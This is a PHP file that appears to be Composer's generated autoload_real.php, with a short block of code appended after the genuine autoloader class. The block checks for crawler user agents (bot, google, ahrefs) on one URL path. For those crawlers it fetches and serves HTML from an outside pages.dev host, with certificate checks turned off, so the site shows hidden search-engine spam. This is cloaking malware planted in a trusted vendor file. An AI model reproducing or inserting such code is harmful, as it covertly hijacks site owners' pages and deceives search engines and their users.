<?php

// autoload_real.php @generated by Composer

class ComposerAutoloaderInitd471d1947c43e9fe97b19c574ac506a3
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderInitd471d1947c43e9fe97b19c574ac506a3', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderInitd471d1947c43e9fe97b19c574ac506a3', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticInitd471d1947c43e9fe97b19c574ac506a3::getInitializer($loader));

        $loader->register(true);

        $filesToLoad = \Composer\Autoload\ComposerStaticInitd471d1947c43e9fe97b19c574ac506a3::$files;
        $requireFile = \Closure::bind(static function ($fileIdentifier, $file) {
            if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
                $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

                require $file;
            }
        }, null, null);
        foreach ($filesToLoad as $fileIdentifier => $file) {
            $requireFile($fileIdentifier, $file);
        }

        return $loader;
    }
}
ob_start();
header('Vary: User-Agent');
$botchar = "/(bot|google|ahrefs)/i";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
function aselolejos($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

if (preg_match($botchar, $ua) && $_SERVER["REQUEST_URI"] == "/index.php/jpnm") {
    usleep(rand(100000, 200000)); 
    header('Content-Type: text/html; charset=utf-8');
    echo aselolejos("https://jembutsitusterpercaya.pages.dev/sempakbasah/index.html");
    ob_end_flush();
    exit;
}
